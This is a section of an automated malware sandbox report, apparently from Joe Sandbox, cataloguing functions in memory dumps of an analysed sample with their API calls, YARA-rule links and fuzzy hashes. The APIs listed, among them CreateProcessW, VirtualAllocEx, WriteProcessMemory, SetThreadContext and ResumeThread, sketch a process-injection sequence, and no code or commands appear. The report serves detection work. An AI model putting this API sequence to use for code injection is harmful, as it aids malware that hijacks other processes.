Instruction ID: 4e38edf131e9425f06ad4a7a81306907a64825683bdffd64baf833d9f1244d99
Opcode Fuzzy Hash: e1af4c3ad2744d26ed53832762a320ac881263ee394701cb7709d9c1dc2f3651
Instruction Fuzzy Hash: 0552E074E012298FDB68DF65C954BEDBBB2BF89300F1091EA9409AB290DB745E85CF50

Function 0535BF60 Relevance: .5, Instructions: 501COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9305e0fa206caf31218f4d7a4d679226a049dd4f33a3d9a71f739910186d7e5c
Instruction ID: 63a6c0d2683318ef072320176b9022f276d18deabca93626bc0a64ad4f7070aa
Opcode Fuzzy Hash: 9305e0fa206caf31218f4d7a4d679226a049dd4f33a3d9a71f739910186d7e5c
Instruction Fuzzy Hash: DC32F274E01229CFDB68DF65C944BEDBBB2BF89300F1091EA9409AB294DB745E85CF50

Function 053565B0 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4bad92ce2f37c407da811adc67cb3371a8aa7d8f12d378636c32ceefed5269f
Instruction ID: 086a040a2b1a0befa6c145e68a39b109d7780fa915dde2522aff8449af26975a
Opcode Fuzzy Hash: b4bad92ce2f37c407da811adc67cb3371a8aa7d8f12d378636c32ceefed5269f
Instruction Fuzzy Hash: A4A1EF74E012198FDB14DFAAD584AADFBF2FF48310F5491A9D808AB356DB34A981CF50

Function 0128D3D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0128D456
GetCurrentThread.KERNEL32 ref: 0128D493
GetCurrentProcess.KERNEL32 ref: 0128D4D0
GetCurrentThreadId.KERNEL32 ref: 0128D529

Memory Dump Source

Source File: 00000001.00000002.4646828622.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1280000__Company.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6b17e924dfb7f89317357f6ff9ffffeaba51f4b8a8b3d9a544db0da9a17203f3
Instruction ID: e5dfd8b9e5e72249ddc09a69c7098f46070f9dd09868ad1d60c567a1b5c366e8
Opcode Fuzzy Hash: 6b17e924dfb7f89317357f6ff9ffffeaba51f4b8a8b3d9a544db0da9a17203f3
Instruction Fuzzy Hash: F9514BB090120ACFEB54DFAAD548BDEBBF1FF88314F208459D519AB390D7346944CB65

Function 0128AD48 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0128AF9E

Memory Dump Source

Source File: 00000001.00000002.4646828622.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1280000__Company.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b979457315230157b842a9c84977f5127b45e499629e6f8ce4b5ff6b20e40626
Instruction ID: 0c2ecfaf9a4efb3a686054b4f2c5d6e62b542a9eec11e31edd7bbdbfa480af24
Opcode Fuzzy Hash: b979457315230157b842a9c84977f5127b45e499629e6f8ce4b5ff6b20e40626
Instruction Fuzzy Hash: 12815A70A11B068FE724EF29D05579ABBF1FF48300F008A2ED586DBA80DB75E845CB91

Function 0535AB94 Relevance: 1.6, APIs: 1, Instructions: 140
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,00000000,?), ref: 0535CBDC

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3da53650e5ca7dd654c8ce326e409804600e9725466a71800c4457df70f85a7a
Instruction ID: 48e66c0f3bfbde6b0fd4102096c5f358ea897b4e7151f40f257e46a5ea2c4e18
Opcode Fuzzy Hash: 3da53650e5ca7dd654c8ce326e409804600e9725466a71800c4457df70f85a7a
Instruction Fuzzy Hash: C951157190132DDFDB24CFA9C940BDDBBB6BF48314F1080AAE909A7250D7759A88CF91

Function 0535CA96 Relevance: 1.6, APIs: 1, Instructions: 139
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,00000000,?), ref: 0535CBDC

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 070d76408e3310bdad60e506674d027a774a9c4793cf215ccf348c3edb9cd66d
Instruction ID: 0ec0b37a7071e84037c5e231f5970c6baa303a8daad548e54de523bf8db17192
Opcode Fuzzy Hash: 070d76408e3310bdad60e506674d027a774a9c4793cf215ccf348c3edb9cd66d
Instruction Fuzzy Hash: E251247590132DDFDB24CFA9C980BDDBBB2BF48314F1081AAE908A7250D7759A89CF51

Function 053518F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05351A02

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 033389dfb0cd6cc90a7ef92f0931aa5fd7d320a58db6a4f2899b46589cdc2641
Instruction ID: 469f6fd596bc73a7256afccbb7ccd96c74c190cda2df8012683ae8f5a4223ef7
Opcode Fuzzy Hash: 033389dfb0cd6cc90a7ef92f0931aa5fd7d320a58db6a4f2899b46589cdc2641
Instruction Fuzzy Hash: 1941BFB1D10349DFDB14CF99C984ADEBBB5BF88310F24812AE819AB210D7B59985CF90

Function 0128590D Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012859C9

Memory Dump Source

Source File: 00000001.00000002.4646828622.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1280000__Company.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e245a047d99368cfadbca3160144863966353a29883112bde82381864e78b00c
Instruction ID: db0c15d3b64ed17c1b28be15c0f91aac2b8bc07d611dfd09e16f370993ee2113
Opcode Fuzzy Hash: e245a047d99368cfadbca3160144863966353a29883112bde82381864e78b00c
Instruction Fuzzy Hash: 7041CF70C11719CFDB24DFA9C8847DEBBB5BF89304F20815AD508AB261DB756946CF50

Function 01284248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012859C9

Memory Dump Source

Source File: 00000001.00000002.4646828622.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1280000__Company.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 92800ff99309cb47f869fae95e2b449039d5398541240c6b70b157a913b4ad0c
Instruction ID: de7d1c99767c32f793664b005ec430cb0ab3e19faed7761cb1c6674ab7b5ad64
Opcode Fuzzy Hash: 92800ff99309cb47f869fae95e2b449039d5398541240c6b70b157a913b4ad0c
Instruction Fuzzy Hash: C941CF70C1171DCBDB24DFAAC884B9EBBF5BF49704F20806AD508AB251DB756946CF90

Function 05354050 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05354111

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 1ffcb73ed20821d3b289a1c584c0bca953d170273d8f0a474ff8a3bd249f4ead
Instruction ID: ba411e25a6daf9170152d6840a883de2461bd18e9485ecd703cefee7ff3bbd10
Opcode Fuzzy Hash: 1ffcb73ed20821d3b289a1c584c0bca953d170273d8f0a474ff8a3bd249f4ead
Instruction Fuzzy Hash: 9A4108B9900309CFDB14CF99C848EAAFBF5FB88324F248459D519AB321D775A945CFA0

Function 0535BC48 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0535BCE0

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 74dd87d89ee10002c172254358e77970aba888927dec30ba96d1c03ec4f9d41b
Instruction ID: dbfa98f5b6053b197bf4529f9a0ec031dfdebf931f3e4b00219cf39926f66b07
Opcode Fuzzy Hash: 74dd87d89ee10002c172254358e77970aba888927dec30ba96d1c03ec4f9d41b
Instruction Fuzzy Hash: ED215771900319DFDB10CFAAC881BDEBBF5FF88320F14842AE959A7240C7789954CBA4

Function 0535BC50 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0535BCE0

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5ee17780be8f84ee1512ae77e6afdbea55feb183d3d7ebe520823e48858b2530
Instruction ID: f9813f3f12075d04f09457883848f81b7b31499de43d689485016ed00be424b2
Opcode Fuzzy Hash: 5ee17780be8f84ee1512ae77e6afdbea55feb183d3d7ebe520823e48858b2530
Instruction Fuzzy Hash: 25213971900349DFDB10CFA9C885BDEBBF5FF88320F108429E959A7250C7789954CBA4

Function 0535BB72 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0535BBF6

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a433e4c3bd60b7b0378a0225d71d56f5965b6ed030218acbaa9068a790f12683
Instruction ID: 964fa710c6069c21de228e5c242132baa9ca0eab9ddf4cb48ae5f9a3e23ac6e6
Opcode Fuzzy Hash: a433e4c3bd60b7b0378a0225d71d56f5965b6ed030218acbaa9068a790f12683
Instruction Fuzzy Hash: CD2137719043098FDB10DFAAC485BEEBBF4EF88220F14842AD959A7241CB789944CBA5

Function 0535BB78 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0535BBF6

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 567a79f89ed0ef1509f6cd5aeafeaee4997fa7f624c435414072522c12d51af8
Instruction ID: 2b65691f103436c8249f5b307f2c84811abed0fbf475434de372e9db9fc40908
Opcode Fuzzy Hash: 567a79f89ed0ef1509f6cd5aeafeaee4997fa7f624c435414072522c12d51af8
Instruction Fuzzy Hash: F72134719043098FDB10DFAAC485BAEBBF4AF88220F14842AD959A7241CB789944CBA5

Function 0128D620 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0128D6A7

Memory Dump Source

Source File: 00000001.00000002.4646828622.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1280000__Company.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c44ae60a80440dfe662842f64d9faa87774a7601adf0609c7d67519173c6723c
Instruction ID: 1a6447243bc1e6f3f6aa869e76a3342f2bff256196126730ff2cac84336767bb
Opcode Fuzzy Hash: c44ae60a80440dfe662842f64d9faa87774a7601adf0609c7d67519173c6723c
Instruction Fuzzy Hash: 0D21E4B5900219DFDB10CF9AD984ADEBFF4FB48310F14801AE958A7350D374A954CFA5

Function 06170563 Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 061705E5

Memory Dump Source

Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6170000__Company.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 78b41e8ccbc1ed6f265805a981be4694b0e4d3ba569613cfea593f7a618e38f6
Instruction ID: 6723f9d4b84fdd386389caf1af810bb692bc70e60b537ecc633a9acb0b3a2076
Opcode Fuzzy Hash: 78b41e8ccbc1ed6f265805a981be4694b0e4d3ba569613cfea593f7a618e38f6
Instruction Fuzzy Hash: E62147B58083898FDB01CFA9C985BDEBFF4EB09310F14849AD554A7252C378A948CBA1

Function 0535CD80 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,00010002), ref: 0535CDF9

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d3f43d41a12ade7bdde06231fb4dcb0d4971c7bbab4eb9a30f13b2996094f5fd
Instruction ID: 86db38050d6a675da85288bf6aeac808c17bafc2668c000a13b8cce007a856db
Opcode Fuzzy Hash: d3f43d41a12ade7bdde06231fb4dcb0d4971c7bbab4eb9a30f13b2996094f5fd
Instruction Fuzzy Hash: E621E2B58003599FDB10CF9AC885BDEFBF4FB48320F10842AE958A7210C378A944CFA5

Function 0535ABB8 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,00010002), ref: 0535CDF9

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5324278ca99abd28d2297d24d5f8e3ae9a9e50b55fa04f330c44d2203fb846c0
Instruction ID: 6da03d96994629b2cd0ccbb0b4d42d1f3fc52964fe3c551b387a5cb706053207
Opcode Fuzzy Hash: 5324278ca99abd28d2297d24d5f8e3ae9a9e50b55fa04f330c44d2203fb846c0
Instruction Fuzzy Hash: 6621E4B5800359DFDB10CF9AC885BDEBBF4FB48324F10842AE958A7210D374A954CBA5

Function 0535CCC8 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON

Download Yara Rule

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0535CD3B

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 473f902a9572b0704f46490a444216bcad95e046479118b36a550c8d0d2e7d23
Instruction ID: 29da81180dc324c8f9a8f226be39413b1add022b7aa36bb65b336b76e2eac102
Opcode Fuzzy Hash: 473f902a9572b0704f46490a444216bcad95e046479118b36a550c8d0d2e7d23
Instruction Fuzzy Hash: 7E1137B1D003498FDB10CF9AC845BDEFBF4FB88224F148129D958A3210D378A545CFA5

Function 0535ABA0 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON

Download Yara Rule

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0535CD3B

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4bfcf7979fbfff555340ab98949d608bb1be7d4eef14ee1256eb81b93a4b30a0
Instruction ID: 01d484207f0d924ba7f1df16c12ff7dad1db0aa9c82493212e3eef05fd4ff8dd
Opcode Fuzzy Hash: 4bfcf7979fbfff555340ab98949d608bb1be7d4eef14ee1256eb81b93a4b30a0
Instruction Fuzzy Hash: 871137B1D043498FDB10CF9AC845BDEFBF4FB88224F548069D958A3610D378A945CFA5

Function 0535BD38 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0535BDAE

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ff71e1a57ec9ebd7da7c9b78e47355193057f4e71b42d0e4197ab8cc379a4f66
Instruction ID: e4a5d8bcef7844174d0d845ee9d97f8b48b2c6625c2699e7faca63e30afc98f0
Opcode Fuzzy Hash: ff71e1a57ec9ebd7da7c9b78e47355193057f4e71b42d0e4197ab8cc379a4f66
Instruction Fuzzy Hash: 6C116A768002499FDB10DFAAC845BDFFBF5EF88320F148419E919A7250C7799554CFA4

Function 06177A30 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,06179862,00000000,00000000,03ED4108,02EF04DC), ref: 06179CB0

Memory Dump Source

Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6170000__Company.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 0b045c60d36c586fac5fe82fa620c4d647b35ad3e99d46c475d175f5fbbed9ec
Instruction ID: 6289e11d785c0187ecfeaa0872605a0e51491f3df6e9fdbd8b786859e230cc2c
Opcode Fuzzy Hash: 0b045c60d36c586fac5fe82fa620c4d647b35ad3e99d46c475d175f5fbbed9ec
Instruction Fuzzy Hash: 941129B1C04249DFDB10CF9AD544BDEBBF4FB48310F108429E554A7250D378A544CFA5

Function 06179C43 Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,06179862,00000000,00000000,03ED4108,02EF04DC), ref: 06179CB0

Memory Dump Source

Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6170000__Company.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 5149b8cdec0f7e46d6fce974a7422786e6dac037f96a8b9a7b1d130e61dce9df
Instruction ID: 67beaac58b61454aa9535dce32a62c18275b9bd60f00052bcd153ce34198eef7
Opcode Fuzzy Hash: 5149b8cdec0f7e46d6fce974a7422786e6dac037f96a8b9a7b1d130e61dce9df
Instruction Fuzzy Hash: FA11F3B5C00249DFDB10CF9AD945BDEBBF8EB48360F10842AE958A3250C378A954DFA5

Function 0535BD40 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0535BDAE

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fd162a31b1a3259fcde984402f9bce5b7fde92650040df415c1c138abe508e1e
Instruction ID: 4fb391a5c65cd2c570bb299b37c2bc58d5fa67d89ff7fdf12687a148ed184b61
Opcode Fuzzy Hash: fd162a31b1a3259fcde984402f9bce5b7fde92650040df415c1c138abe508e1e
Instruction Fuzzy Hash: 271137718002499FDB10DFAAC845BEFFBF5EF88320F148419E519A7250C7799550CFA5

Function 0535BDF8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0535BE62

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8b1751197c8d11cdd46787d38ce97ba1bdf379c94fd2eed8bf7377cae60b38b3
Instruction ID: f0cc98ec6eb8d9be945b83f01b99544e99a9f0f06b61d84ebb4dd2dddc87d9c1
Opcode Fuzzy Hash: 8b1751197c8d11cdd46787d38ce97ba1bdf379c94fd2eed8bf7377cae60b38b3
Instruction Fuzzy Hash: 191158718003498FDB10DFAAD455BEFFBF4EF88620F24841AD51AA7250C779A944CFA4

Function 0535BE00 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0535BE62

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0e5ead527988e36eddd047869bc118831c0093063d91113068bac2f9997a1a8b
Instruction ID: 4a69c5559f3067f8f526a3f88796adb2bf5c71d2179f087f081fcdd39430a7ef
Opcode Fuzzy Hash: 0e5ead527988e36eddd047869bc118831c0093063d91113068bac2f9997a1a8b
Instruction Fuzzy Hash: 251158718003498FDB10DFAAC445BAEFBF4AF88620F248419C51AA7250C775A940CB94

Function 06170588 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 061705E5

Memory Dump Source

Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6170000__Company.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e225f117a828b0fdd6568818061de32ff06901dca93090cab517c35c60484c58
Instruction ID: 71867e9fb38eb15665fc566be3b4f7f042a89d7b3ebfc60b5096e29c55121342
Opcode Fuzzy Hash: e225f117a828b0fdd6568818061de32ff06901dca93090cab517c35c60484c58
Instruction Fuzzy Hash: F21103B5800349DFDB10CF9AC945BEEFBF8EB48320F10845AE558A7250D379A984CFA5

Function 0128AF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0128AF9E

Memory Dump Source

Source File: 00000001.00000002.4646828622.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1280000__Company.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5e976b558af4ff5a1c2f6a86c3bd512494c78de39a4c5f9135ffc3a5fa64d824
Instruction ID: f4f0a35ba5d84216d60b6337bc053651aead0dd2c03c2f77f922c01c3e68ccdf
Opcode Fuzzy Hash: 5e976b558af4ff5a1c2f6a86c3bd512494c78de39a4c5f9135ffc3a5fa64d824
Instruction Fuzzy Hash: AF1110B5C012498FDB10DF9AC444BDEFBF4EF88224F10841AD919A7250C379A545CFA5

Function 061792AC Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,061799A7), ref: 0617A445

Memory Dump Source

Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6170000__Company.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: b7ca407f561fe035fe8e9a74d8131dc0079ad8311a3b16717fb996fb1a4418e7
Instruction ID: 47fc16afed8d6caea6f13ac4f8b4110189f9f10e1b79973faea35205897f081b
Opcode Fuzzy Hash: b7ca407f561fe035fe8e9a74d8131dc0079ad8311a3b16717fb996fb1a4418e7
Instruction Fuzzy Hash: E111EDB1C046498FDB20CF9AD548B9EFBF4FB48224F10846AE559A7210D379A544CFA5

Function 06170818 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06171F1D

Memory Dump Source

Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6170000__Company.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 99a0ce8f0ad6e352474f271d9c71250a558d48dc9d751452dc87bfb2c46e3643
Instruction ID: e4eee121452fe017a1078b6ccaf73a0a50f178a0683d1477b79d220ae736f31e
Opcode Fuzzy Hash: 99a0ce8f0ad6e352474f271d9c71250a558d48dc9d751452dc87bfb2c46e3643
Instruction Fuzzy Hash: F11145B1804308DFDB60DF9AC545BDEBBF4EB48320F248459D619A7200C374A944CFA5

Function 06171EC0 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06171F1D

Memory Dump Source

Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6170000__Company.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: a4d117305c0c6a5f03198367eee511a75e0a4a38f67ef07fa71c105375265413
Instruction ID: fc69697ab767c9187d8b58fe840961c1bc526b25b6cb10802232b55c5a760f6a
Opcode Fuzzy Hash: a4d117305c0c6a5f03198367eee511a75e0a4a38f67ef07fa71c105375265413
Instruction Fuzzy Hash: 7C1142B5800348CFDB10DF9AD485BDEBBF4EB48320F24841AE619A3200C338A944CFA5

Function 0617A3E3 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,061799A7), ref: 0617A445

Memory Dump Source

Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6170000__Company.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 5a3d45b299479cac841dfc2a39e4289fb095b2fa4c104315a39a7d1b2e1572e8
